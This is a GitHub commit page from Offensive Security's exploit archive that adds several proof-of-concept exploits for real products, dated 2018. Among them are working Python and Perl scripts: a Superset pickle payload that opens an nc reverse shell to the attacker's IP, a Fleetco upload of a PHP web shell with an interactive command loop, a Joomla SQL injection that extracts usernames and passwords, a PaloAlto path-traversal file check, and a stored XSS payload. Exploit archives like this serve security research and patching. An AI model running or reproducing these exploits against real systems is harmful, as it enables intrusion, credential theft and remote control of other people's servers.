This repository has been archived by the owner on Nov 28, 2022. It is now read-only.
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
10 changes to exploits/shellcodes Mozilla Firefox 63.0.1 - Denial of Service (PoC) Budabot 4.0 - Denial of Service (PoC) CyberArk 9.7 - Memory Disclosure Fleetco Fleet Maintenance Management 1.2 - Remote Code Execution Rockwell Automation Allen-Bradley PowerMonitor 1000 - Cross-Site Scripting PaloAlto Networks Expedition Migration Tool 1.0.106 - Information Disclosure Joomla! Component JE Photo Gallery 1.1 - 'categoryid' SQL Injection PHP Server Monitor 3.3.1 - Cross-Site Request Forgery Apache Superset 0.23 - Remote Code Execution Wordpress Plugins Advanced-Custom-Fields 5.7.7 - Cross-Site Scripting
- Loading branch information
Offensive Security
committed
Dec 4, 2018
1 parent
7cc86c3
commit 0a4925c
Showing
11 changed files
with
607 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,21 @@ | ||
# Exploit Title: Rockwell Automation Allen-Bradley PowerMonitor 1000 - Cross-Site Scripting | ||
# Date: 2018-11-27 | ||
# Exploit Author: Luca.Chiou | ||
# Vendor Homepage: https://www.rockwellautomation.com/ | ||
# Version: 1408-EM3A-ENT B | ||
# Tested on: It is a proprietary devices: https://ab.rockwellautomation.com/zh/Energy-Monitoring/1408-PowerMonitor-1000 | ||
# CVE : N/A | ||
|
||
# 1. Description: | ||
# In Rockwell Automation Allen-Bradley PowerMonitor 1000 web page, | ||
# user can add a new user by access the /Security/Security.shtm. | ||
# When users add a new user, the new user’s account will in the post data. | ||
# Attackers can inject malicious XSS code in user’s account parameter of post data. | ||
# The user’s account parameter will be stored in database, so that cause a stored XSS vulnerability. | ||
|
||
# 2. Proof of Concept: | ||
# Browse http://<Your Modem IP>/Security/Security.shtm | ||
# In page Security.shtm, add a new user | ||
# Send this post data: | ||
|
||
/Security/cgi-bin/security|0|0|<script>alert(123)</script> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,24 @@ | ||
# Exploit Title: Budabot 4.0 - Denial of Service (PoC) | ||
# Date: 2018-10-15 | ||
# Exploit Author: Ryan Delaney | ||
# Author Contact: ryan.delaney@owasp.org | ||
# Vendor Homepage: http://budabot.com/ | ||
# Software Link: http://budabot.com/forum/viewtopic.php?f=8&t=1413 | ||
# Version: 0.6 -> 4.0 | ||
# Tested on: 4.0 | ||
# CVE: CVE-2018-19290 | ||
|
||
# 1. Description | ||
# In modules/HELPBOT_MODULE in Budabot 0.6 through 4.0, lax syntax validation | ||
# allows remote attackers to perform a command injection attack against the | ||
# PHP daemon with a crafted command, resulting in a denial of service or | ||
# possibly unspecified other impact. In versions before 3.0, | ||
# modules/HELPBOT_MODULE/calc.php has the vulnerable code; in 3.0 and above, | ||
# modules/HELPBOT_MODULE/HelpbotController.class.php has the vulnerable code. | ||
|
||
# 2. Proof of Concept | ||
|
||
Start the Budabot listener, set valid configuration options, and wait for | ||
the chatbot to announce it's ready in-game. | ||
Send the chatbot a private message containing "!calc 5 x 5", and the | ||
Budabot listener will terminate. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,64 @@ | ||
# Exploit Title: PaloAlto Networks Expedition Migration Tool 1.0.106 - Information Disclosure | ||
# Date: 2018-11-28 | ||
# Exploit Author: paragonsec @ Critical Start | ||
# Vendor Homepage: https://live.paloaltonetworks.com/t5/Expedition-Migration-Tool/ct-p/migration_tool | ||
# Software Link: https://paloaltonetworks.app.box.com/s/davuvo65k727nm7feuug0d783zo6fjx8 | ||
# Version: 1.0.106 | ||
# Tested on: Linux | ||
# CVE : 2018-10142 | ||
|
||
#!/usr/bin/env python | ||
|
||
import argparse | ||
import requests | ||
import sys | ||
import collections | ||
|
||
#Colors | ||
OKRED = '\033[91m' | ||
OKGREEN = '\033[92m' | ||
ENDC = '\033[0m' | ||
|
||
parser = argparse.ArgumentParser() | ||
parser.add_argument("--rhost", help = "Remote Host") | ||
parser.add_argument('--file', help = 'File to check (e.g /etc/passwd, /etc/shadow)') | ||
args = parser.parse_args() | ||
|
||
# Check to ensure at least one argument has been passed | ||
if len(sys.argv)==1: | ||
parser.print_help(sys.stderr) | ||
sys.exit(1) | ||
|
||
rhost = args.rhost | ||
rfile = args.file | ||
|
||
exploit_url = "http://" + rhost + "/API/process/checkPidStatus.php" | ||
|
||
headers = [ | ||
('User-Agent','Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0'), | ||
('Accept', 'application/json, text/javascript, */*; q=0.01'), | ||
('Accept-Language', 'en-US,en;q=0.5'), | ||
('Accept-Encoding', 'gzip, deflate'), | ||
('Connection', 'close') | ||
] | ||
|
||
# probably not necessary but did it anyways | ||
headers = collections.OrderedDict(headers) | ||
|
||
# Setting up GET body parameters | ||
body = "pid=/../" + rfile | ||
|
||
print(OKGREEN + "Author: " + ENDC + "paragonsec @ Critical Start (https://www.criticalstart.com)") | ||
print(OKGREEN + "CVE: " + ENDC + "2018-10142") | ||
print(OKGREEN + "Description: " + ENDC + "Information Disclosure in Expedition Migration Tool") | ||
print(OKGREEN + "Vuln Versions: " + ENDC + "< 1.0.107\n") | ||
|
||
print(OKGREEN + "[+]" + ENDC + "Running exploit...") | ||
|
||
s = requests.Session() | ||
|
||
req = requests.post(exploit_url, headers=headers, data=body) | ||
if "false" not in req.text: | ||
print(OKGREEN + "[+]" + ENDC + "Exploit worked! " + rfile + " exists!\n") | ||
else: | ||
print(OKRED + "[!]" + ENDC + "File " + rfile + " does not exist!\n") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,97 @@ | ||
# Exploit Title: Apache Superset 0.23 - Remote Code Execution | ||
# Date: 2018-05-17 | ||
# Exploit Author: David May (david.may@semanticbits.com) | ||
# Vendor Homepage: https://superset.apache.org/ | ||
# Software Link: https://github.com/apache/incubator-superset | ||
# Version: Any before 0.23 | ||
# Tested on: Ubuntu 18.04 | ||
# CVE-ID: CVE-2018-8021 | ||
|
||
# I originally disclosed this to the Apache Superset team back in May, and the fix had already been | ||
# in place, but not backported. As far as I know, this is the first weaponized exploit for this CVE. | ||
|
||
#!/usr/bin/env python | ||
|
||
import sys | ||
import os | ||
from lxml import html | ||
import requests | ||
|
||
# Change these values to your TCP listener | ||
myIP = '192.168.137.129' | ||
myPort = '8888' | ||
# Credentials must belong to user with 'can Import Dashboards on Superset' privilege | ||
username = 'test' | ||
password = 'test' | ||
|
||
# Logic in case script arguments are not given | ||
if len(sys.argv) < 3: | ||
print('Verify you have started a TCP listener on the specified IP and Port to receive the reverse shell...') | ||
print('Script Usage:') | ||
print('./supersetrce.py <superset server ip> <superset port>') | ||
sys.exit() | ||
|
||
else: | ||
# Script arguments | ||
supersetIP = sys.argv[1] | ||
supersetPort = sys.argv[2] | ||
# Verify these URLs match your environment | ||
login_URL = 'http://' + supersetIP + ':' + supersetPort + '/login/' | ||
upload_URL = 'http://' + supersetIP + ':' + supersetPort + '/superset/import_dashboards' | ||
|
||
# Checks to see if file that we are going to write already exists in case this is run more than once | ||
if os.path.isfile('evil.pickle'): | ||
os.remove('evil.pickle') | ||
|
||
# Headers that we append to our POST requests | ||
headers_dict = { | ||
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0', | ||
'DNT': '1', | ||
'Connection': 'close', | ||
'Upgrade-Insecure-Requests': '1', | ||
} | ||
|
||
# Creates evil pickle file and writes the reverse shell to it | ||
evilPickle = open('evil.pickle','w+') | ||
evilPickle.write('cos\nsystem\n(S\'rm /tmp/backpipe;mknod /tmp/backpipe p;/bin/sh 0</tmp/backpipe | nc ' + myIP + ' ' + myPort + ' 1>/tmp/backpipe\'\ntR.') | ||
evilPickle.close() | ||
|
||
# Start a session so we have persistent cookies | ||
session = requests.session() | ||
|
||
# Grabs the Login page to parse it for its CSRF token | ||
login_page = session.get(login_URL) | ||
if login_page.status_code != 200: | ||
print('Login page not reached, verify URLs in script') | ||
login_tree = html.fromstring(login_page.content) | ||
csrf_token = login_tree.xpath('//input[@id="csrf_token"]/@value') | ||
|
||
# Form data that is sent in the POST request to Login page | ||
login_data = { | ||
'csrf_token' : csrf_token, | ||
'username' : username, | ||
'password' : password, | ||
} | ||
|
||
# Adds the Referer header for the login page | ||
headers_dict['Referer'] = login_URL | ||
|
||
# Logon action | ||
login = session.post(login_URL, headers=headers_dict, data=login_data) | ||
|
||
# Grabs the Upload page to parse it for its CSRF token | ||
upload_page = session.get(upload_URL) | ||
if upload_page.status_code != 200: | ||
print('Upload page not reached, verify credentials and URLs in script') | ||
upload_tree = html.fromstring(upload_page.content) | ||
csrf_token = upload_tree.xpath('//input[@id="csrf_token"]/@value') | ||
|
||
# Adds the Referer header for the Upload page | ||
headers_dict['Referer'] = upload_URL | ||
|
||
# Upload action | ||
upload = session.post(upload_URL, headers=headers_dict, data={'csrf_token':csrf_token}, files={'file':('evil.pickle',open('evil.pickle','rb'),'application/octet-stream')}) | ||
|
||
# Closes the session | ||
session.close() | ||
sys.exit() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,77 @@ | ||
# Exploit Title: Fleetco Fleet Maintenance Management 1.2 - Remote Code Execution | ||
# Date: 2018-11-23 | ||
# Exploit Author: Özkan Mustafa Akkuş (AkkuS) | ||
# Contact: https://pentest.com.tr | ||
# Vendor Homepage: https://www.fleetco.space | ||
# Software Link: http://www.fleetco.space/download/215/ | ||
# Version: v1.2 | ||
# Category: Webapps | ||
# Tested on: XAMPP for Linux 1.7.2 | ||
# Software Description : Fleetco FMM is a free, web-based vehicle fleet maintenance management | ||
# system written in PHP with MySQL database backend. | ||
# Description : Fleetco 1.2 and lower versions allows to upload arbitrary ".php" files which | ||
# leads to a remote command execution on the remote server. Any authorized user is enough to exploit. | ||
# ================================================================== | ||
# PoC: | ||
|
||
#!/usr/bin/python | ||
|
||
import mechanize | ||
import sys | ||
import cookielib | ||
import requests | ||
import colorama | ||
from colorama import Fore | ||
|
||
print "\n[*] Fleetco Fleet Maintenance Management v1.2 - Remote Code Execution" | ||
print "[*] Vulnerability discovered by AkkuS" | ||
print "[*] My Blog - https://www.pentest.com.tr\n" | ||
if (len(sys.argv) != 2): | ||
print "[*] Usage: poc.py <RHOST>" | ||
exit(0) | ||
|
||
rhost = sys.argv[1] | ||
|
||
# User Information Input | ||
UserName = str(raw_input("User Name: ")) | ||
Password = str(raw_input("Password: ")) | ||
|
||
# Login into site | ||
print(Fore.BLUE + "+ [*] Loging in...") | ||
br = mechanize.Browser() | ||
br.set_handle_robots(False) | ||
|
||
# Cookie Jar | ||
cj = cookielib.LWPCookieJar() | ||
br.set_cookiejar(cj) | ||
|
||
br.open("http://"+rhost+"/login.php") | ||
assert br.viewing_html() | ||
br.select_form(name="form1") | ||
br.select_form(nr=0) | ||
br.form['username'] = UserName | ||
br.form['password'] = Password | ||
br.submit() | ||
|
||
# Where are you | ||
title = br.title() | ||
print (Fore.YELLOW + "+ [*] You're in "+title+" section of the app now") | ||
|
||
# Create Accident Records with multipart/form-data to RCE | ||
rce_headers = {"Content-Type": "multipart/form-data; boundary=---------------------------10664657171782352435254769348"} | ||
rce_data="-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"value_Fleet_1\"\r\n\r\nCargo Carriers\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"value_Vehicle_1\"\r\n\r\nBF1470\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"value_Type_1\"\r\n\r\nLorry\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"value_Date_1\"\r\n\r\n11/07/2018\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"type_Date_1\"\r\n\r\ndate2\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"type_Time_1\"\r\n\r\ntime\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"value_Driver_1\"\r\n\r\nAntony Croos\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"value_Details_1\"\r\n\r\ntest\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"type_Images_1\"\r\n\r\nupload2\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"value_Images_1\"; filename=\"RCE.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php if(isset($_REQUEST['cmd'])){ echo \"<pre>\"; $cmd = ($_REQUEST['cmd']); system($cmd); echo \"</pre>\"; die; }?>\n\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"filename_Images_1\"\r\n\r\nRCE.php\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"value_EnteredBy_1\"\r\n\r\nMark Croos\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"value_SysDate_1\"\r\n\r\n2018-11-23 14:58:09\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n1\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"a\"\r\n\r\nadded\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"rndVal\"\r\n\r\n0.8040138072331872\r\n-----------------------------10664657171782352435254769348--\r\n" | ||
|
||
upload = requests.post("http://"+rhost+"/accidents_add.php?submit=1&", headers=rce_headers, cookies=cj, data=rce_data) | ||
if upload.status_code == 200: | ||
print (Fore.GREEN + "+ [*] Shell successfully uploaded!") | ||
|
||
# Shell validation and exploit | ||
while True: | ||
shellctrl = requests.get("http://"+rhost+"/files/RCE.php") | ||
if shellctrl.status_code == 200: | ||
Command = str(raw_input(Fore.WHITE + "shell> ")) | ||
URL = requests.get("http://"+rhost+"/files/RCE.php?cmd="+Command+"") | ||
print URL.text | ||
else: | ||
print (Fore.RED + "+ [X] Unable to upload or access the shell") | ||
sys.exit() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,55 @@ | ||
# Exploit Title: Joomla! Component JE Photo Gallery 1.1 - SQL Injection | ||
# Dork: N/A | ||
# Date: 2018-11-26 | ||
# Exploit Author: Ihsan Sencan | ||
# Vendor Homepage: https://joomlaextensions.co.in | ||
# Software Link: http://joomlaextensions.co.in/download/1387375463_JE%20PhotoGallery%20(%20J-%203.0%20).zip | ||
# Version: 1.1 | ||
# Category: Webapps | ||
# Tested on: WiN7_x64/KaLiLinuX_x64 | ||
# CVE: N/A | ||
|
||
# POC: | ||
# 1) | ||
|
||
#!/usr/bin/perl -w | ||
|
||
sub clear{ | ||
system(($^O eq 'MSWin32') ? 'cls' : 'clear'); } | ||
clear(); | ||
print " | ||
./ | ||
(o o) | ||
###############################oOOo-(-)-oOOo############################### | ||
______ _______ ___ _ __ _____ _______ ___________ _ __ | ||
/ _/ / / / ___// | / | / / / ___// ____/ | / / ____/ | / | / / | ||
/ // /_/ /\__ \/ /| | / |/ / \__ \/ __/ / |/ / / / /| | / |/ / | ||
_/ // __ /___/ / ___ |/ /| / ___/ / /___/ /| / /___/ ___ |/ /| / | ||
/___/_/ /_//____/_/ |_/_/ |_/ /____/_____/_/ |_/\____/_/ |_/_/ |_/ | ||
WWW.IHSAN.NET | ||
+ | ||
Joomla! Component JE Photo Gallery 1.1 - SQL Injection | ||
############################################################################ | ||
"; | ||
|
||
use LWP::UserAgent; | ||
print "\nTarget:[http://site.com/path/]: "; | ||
chomp(my $target=<STDIN>); | ||
print "\n[!] Exploiting Progress...\n"; | ||
print "\n"; | ||
$UT="wizjk_users"; | ||
$S="index.php?"; | ||
$I="tmpl=component&option=com_jephotogallery&view=category&task=fetchimage&categoryid="; | ||
$E="%2d%32%39%20%55%4e%69%6f%6e%20%73%65%4c%45%43%54%20%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%75%73%65%72%6e%61%6d%65%2c%30%78%33%61%2c%70%61%73%73%77%6f%72%64%29%20%46%52%4f%4d%20".$UT."%29%2c%30%2c%30%2c%30%2c%30%2c%30%2c%30%2c%30%2c%30%2c%4e%75%4c%4c%2c%30%2c%30%2d%2d%20%2d"; | ||
$SIE = LWP::UserAgent->new() or die "Could not initialize browser\n"; | ||
$SIE->agent('Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0'); | ||
$host = $target . "".$S."".$I."".$E.""; | ||
$res = $SIE->request(HTTP::Request->new(GET=>$host)); | ||
$answer = $res->content; if ($answer =~/{"id":"(.*?)"/){ | ||
print "[+] Success !!!\n"; | ||
print "\n[+] Detail : $1\n"; | ||
print "\n"; | ||
} | ||
else{print "\n[-]Not found.\n"; | ||
} |
Oops, something went wrong.